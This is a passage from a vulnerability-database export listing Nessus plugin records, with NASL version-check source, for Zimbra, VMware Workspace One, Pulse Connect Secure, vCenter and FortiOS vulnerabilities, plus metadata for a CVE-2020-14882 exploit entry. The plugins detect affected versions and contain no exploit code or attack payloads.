"2020-11-03T10:49:35", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-08-07T12:56:08", "id": "9AEDE16C-FF28-5178-A8D1-CB6649E9ED56", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "nessus": [{"lastseen": "2022-06-30T17:57:10", "description": "Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.\n\nNote that Nessus does not identify patch level or components versions for the Synacor Zimbra Collaboration Suite.\nYou will need to verify if the patch has been applied by executing the command 'zmcontrol -v' from the command line as the 'zimbra' user.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-12T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 8.7.x < 8.7.11p10 XML External Entity injection (XXE) vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-9670"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_8_7_11P10.NASL", "href": "https://www.tenable.com/plugins/nessus/127133", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127133);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2019-9670\");\n script_xref(name:\"IAVA\", value:\"2019-A-0276\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"EDB-ID\", value:\"46693\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Zimbra Collaboration Server 8.7.x < 8.7.11p10 XML External Entity injection (XXE) vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by an XXE vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10\nhas an XML External Entity injection (XXE) vulnerability.\n\nNote that Nessus does not identify patch level or components versions for the Synacor Zimbra Collaboration Suite.\nYou will need to verify if the patch has been applied by executing the command 'zmcontrol -v' from\nthe command line as the 'zimbra' user.\");\n # https://wiki.zimbra.com/wiki/Zimbra_Releases/8.7.11/P10\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?803cb0df\");\n # https://bugzilla.zimbra.com/show_bug.cgi?id=109129\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6ff4b6a4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.exploit-db.com/exploits/46693\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 7.7.11p10 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9670\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zimbra:collaboration_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\");\n script_require_keys(\"www/zimbra_zcs\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443, 7071);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('http.inc');\ninclude('webapp_func.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : 'zimbra_zcs',\n port : port,\n exit_on_fail : TRUE\n);\n\napp = 'Zimbra Collaboration Server';\ndir = install['dir'];\nversion = install['ver'];\ninstall_url = build_url(port:port, qs:dir);\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_url);\n\n# Versions 8.7.x <= 8.7.11.x, detected version is in the following format: 8.7.11_GA_xxxx\nif (version !~ '8\\\\.7\\\\.([0-9]|10|11)') audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n\nreport =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 8.7.11 Patch 10\\n';\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-28T12:29:12", "description": "The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected by a unspecified command injection vulnerability.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "VMware Workspace One Access / VMware Identity Manager Command Injection Vulnerability (VMSA-2020-0027)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-4006"], "modified": "2022-02-25T00:00:00", "cpe": ["x-cpe:/a:vmware:workspace_one_access", "cpe:/a:vmware:identity_manager"], "id": "VMWARE_WORKSPACE_ONE_ACCESS_CVE-2020-4006.NASL", "href": "https://www.tenable.com/plugins/nessus/143574", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143574);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2020-4006\");\n script_xref(name:\"VMSA\", value:\"2020-0027\");\n script_xref(name:\"CERT\", value:\"724367\");\n script_xref(name:\"IAVA\", value:\"2020-A-0551\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"VMware Workspace One Access / VMware Identity Manager Command Injection Vulnerability (VMSA-2020-0027)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An identity store broker application running on the remote host is affected by a command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected\nby a unspecified command injection vulnerability.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2020-0027.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/s/article/81754\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.kb.cert.org/vuls/id/724367\");\n # https://media.defense.gov/2020/Dec/07/2002547071/-1/-1/0/CSA_VMWARE%20ACCESS_U_OO_195076_20.PDF\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?55531cb4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cyber.gc.ca/en/alerts/active-exploitation-vmware-vulnerability\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the HW-128524 hotfix to VMware Workspace One Access / VMware Identity Manager as per the VMSA-2020-0027 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-4006\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:workspace_one_access\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:identity_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workspace_one_access_web_detect.nbin\");\n script_require_keys(\"installed_sw/VMware Workspace ONE Access\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'VMware Workspace ONE Access';\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\napp_info = vcf::vmware_workspace_one_access::get_app_info(port:port);\n\nconstraints = [\n { 'min_version':'3.3.1.0.0', 'fixed_version':'3.3.1.0.17267891', 'fixed_display':'3.3.1.0 Build 17267891 (HW-128524)' },\n { 'min_version':'3.3.2.0.0', 'fixed_version':'3.3.2.0.17267204', 'fixed_display':'3.3.2.0 Build 17267204 (HW-128524)' },\n { 'min_version':'3.3.3.0.0', 'fixed_version':'3.3.3.0.17267230', 'fixed_display':'3.3.3.0 Build 17267230 (HW-128524)' },\n\n { 'min_version':'19.03.0.0.0', 'fixed_version':'19.03.0.0.17267198', 'fixed_display':'19.03.0.0 Build 17267198 (HW-128524)' },\n { 'min_version':'19.03.0.1.0', 'fixed_version':'19.03.0.1.17267200', 'fixed_display':'19.03.0.1 Build 17267200 (HW-128524)' },\n\n { 'min_version':'20.01.0.0', 'fixed_version':'20.01.0.0.17267236', 'fixed_display':'20.01.0.0 Build 17267236 (HW-128524)' },\n { 'min_version':'20.10.0.0', 'fixed_version':'20.10.0.0.17267237', 'fixed_display':'20.10.0.0 Build 17267237 (HW-128524)' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T16:50:52", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to 8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file read vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by requesting a specially crafted URI, to read arbitrary files and disclose sensitive information.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2019-08-16T00:00:00", "type": "nessus", "title": "Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "href": "https://www.tenable.com/plugins/nessus/127908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127908);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\"CVE-2019-11510\");\n script_bugtraq_id(108073);\n script_xref(name:\"IAVA\", value:\"2019-A-0309-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an arbitrary file read vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to \n8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file \nread vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by \nrequesting a specially crafted URI, to read arbitrary files and disclose sensitive information.\");\n # https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d23f9165\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.1R15.1, 8.2R12.1, 8.3R7.1, 9.0R3.4, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11510\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Pulse Connect Secure File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n script_require_ports(443);\n\n exit(0);\n}\n\n# Deprecated\nexit(0, 'This plugin has been deprecated. Use pulse_connect_secure-sa-44101.nasl (plugin ID 124766) instead.');\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Pulse Connect Secure', port:443, webapp:TRUE);\n\nconstraints = [\n {'fixed_version' : '8.1R15.1'},\n {'min_version' : '8.2' , 'fixed_version' : '8.2R12.1'},\n {'min_version' : '8.3' , 'fixed_version' : '8.3R7.1'},\n {'min_version' : '9.0' , 'fixed_version' : '9.0R3.4'},\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-04T17:11:44", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-06-01T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.5 < 6.5 U3n / 6.7 < 6.7 U3l / 7.0 < 7.0 U1c Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113243", "href": "https://www.tenable.com/plugins/was/113243", "sourceData": "No source data", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T17:14:33", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server RCE (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21972.NBIN", "href": "https://www.tenable.com/plugins/nessus/146825", "sourceData": "Binary data vmware_vcenter_cve-2021-21972.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:46:04", "description": "The plugin was deprecated due to checking hosts for FortiClient instead of FortiOS. Use fortios_FG-IR-18-384.nasl (plugin ID 125885) instead.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-14T00:00:00", "type": "nessus", "title": "Fortinet FortiOS (Mac OS X) 5.4.6 <= 5.4.12 / 5.6.3 < 5.6.8 / 6.0.x < 6.0.5 SSL VPN Directory Traversal (FG-IR-18-384) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "MACOSX_FORTIOS_FG-IR-18-384.NASL", "href": "https://www.tenable.com/plugins/nessus/125891", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2020/11/18. Deprecated by fortios_FG-IR-18-384.nasl\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125891);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2018-13379\");\n script_bugtraq_id(108693);\n script_xref(name:\"IAVA\", value:\"0001-A-0002-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Fortinet FortiOS (Mac OS X) 5.4.6 <= 5.4.12 / 5.6.3 < 5.6.8 / 6.0.x < 6.0.5 SSL VPN Directory Traversal (FG-IR-18-384) (deprecated)\");\n script_summary(english:\"Checks the version of FortiOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"The plugin was deprecated due to checking hosts for FortiClient instead of FortiOS. Use fortios_FG-IR-18-384.nasl\n(plugin ID 125885) instead.\");\n # https://fortiguard.com/psirt/FG-IR-18-384\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa8b8063\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13379\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Fortinet FortiGate SSL VPN File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/14\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macos_forticlient_detect.nbin\");\n script_require_keys(\"installed_sw/FortiClient (macOS)\", \"Host/MacOSX/Version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use fortios_FG-IR-18-384.nasl (plugin ID 125885) instead.');\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-16T16:45:59", "description": "The remote host is running a version of FortiOS 5.4.6 prior or equal to 5.4.12, 5.6.3 prior to 5.6.8 or 6.0.x prior to 6.0.5. It is, therefore, affected by a directory traversal vulnerability in the SSL VPN web portal, due to an improper limitation of a pathname to a restricted Directory. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to download arbitrary FortiOS system files.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-14T00:00:00", "type": "nessus", "title": "Fortinet FortiOS 5.4.6 <= 5.4.12 / 5.6.3 < 5.6.8 / 6.0.x < 6.0.5 SSL VPN Directory Traversal (FG-IR-18-384)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "FORTIOS_FG-IR-18-384.NASL", "href": "https://www.tenable.com/plugins/nessus/125885", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125885);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2018-13379\");\n script_bugtraq_id(108693);\n script_xref(name:\"IAVA\", value:\"0001-A-0002-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Fortinet FortiOS 5.4.6 <= 5.4.12 / 5.6.3 < 5.6.8 / 6.0.x < 6.0.5 SSL VPN Directory Traversal (FG-IR-18-384)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a directory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of FortiOS 5.4.6 prior or equal to 5.4.12, 5.6.3 prior to 5.6.8 or 6.0.x prior to\n6.0.5. It is, therefore, affected by a directory traversal vulnerability in the SSL VPN web portal, due to an improper\nlimitation of a pathname to a restricted Directory. An unauthenticated, remote attacker can exploit this, via a\nspecially crafted HTTP request, to download arbitrary FortiOS system files.\");\n # https://fortiguard.com/psirt/FG-IR-18-384\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa8b8063\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Fortinet FortiOS version to 5.6.8, 6.0.5, 6.2.0 or later. Alternatively, apply one of the workarounds\noutlined in the linked advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13379\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Fortinet FortiGate SSL VPN File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/14\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"fortinet_version.nbin\");\n script_require_keys(\"Host/Fortigate/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('vcf.inc');\ninclude('vcf_extras_fortios.inc');\n\napp_info = vcf::get_app_info(app:'FortiOS', kb_ver:'Host/Fortigate/version');\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvcf::fortios::verify_model();\n\nconstraints = [\n { 'min_version' : '5.4.6', 'max_version' : '5.4.12', 'fixed_display' : '5.6.8, 6.0.5, 6.2.0 or later' },\n { 'min_version' : '5.6.3', 'fixed_version' : '5.6.8' },\n { 'min_version' : '6.0.0', 'fixed_version' : '6.0.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-16T16:54:32", "description": "The remote host is running a version of FortiOS 5.6.3 prior to 5.6.8 or 6.0.x prior to 6.0.5. It is, therefore, affected by a directory traversal vulnerability in the SSL VPN web portal, due to improper sanitization of path traversal characters in URLs. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to download arbitrary FortiOS system files.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-09-06T00:00:00", "type": "nessus", "title": "Fortinet FortiOS SSL VPN Directory Traversal Vulnerability (FG-IR-18-384) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "FORTIOS_FG-IR-18-384_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/128552", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128552);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2018-13379\");\n script_bugtraq_id(108693);\n script_xref(name:\"IAVA\", value:\"0001-A-0002-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Fortinet FortiOS SSL VPN Directory Traversal Vulnerability (FG-IR-18-384) (Direct 